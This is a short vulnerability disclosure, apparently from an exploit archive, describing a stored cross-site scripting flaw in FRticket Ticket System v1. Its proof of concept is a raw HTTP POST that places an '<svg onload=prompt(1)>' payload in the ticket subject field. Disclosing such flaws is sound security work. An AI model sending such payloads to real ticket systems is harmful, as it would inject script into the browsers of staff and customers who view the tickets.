FRticket Ticket System 1 Cross Site Scripting

2016.06.14

Credit: Hamit ABİŞ

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: FRticket - Ticket System - Stored XSS
# Google Dork: [if applicable]
# Date: 11.06.2016
# Exploit Author: Hamit AB?
# Vendor Homepage: http://codecanyon.net/item/frticket-ticket-system/16539836
# Version: v1
#########################################################################################################
About
Get the world?s most popular customer support ticket system. FRticket is basically a management of enquiries between customers , agents and admins
Features:
- Admin Panel Dashboard
- Email Templates
- Agent Assignment
- Status Management
- Priority Management
- Categories Management
- And More Coming Soon?
#########################################################################################################
##########################################################################################################
Proof of Concept - Stored Ticket Title
POST /ticket/public/ticket HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Connection: keep-alive
_token=3XSACg1vDJQgzFCkVGk7nqE0HMOPlsuo7sbj5Z2y&subject=<svg onload=prompt(1)>&priority=2&category=2&description=somecomments
##########################################################################################################
Twitter: https://twitter.com/sar1nz

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

FRticket Ticket System 1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.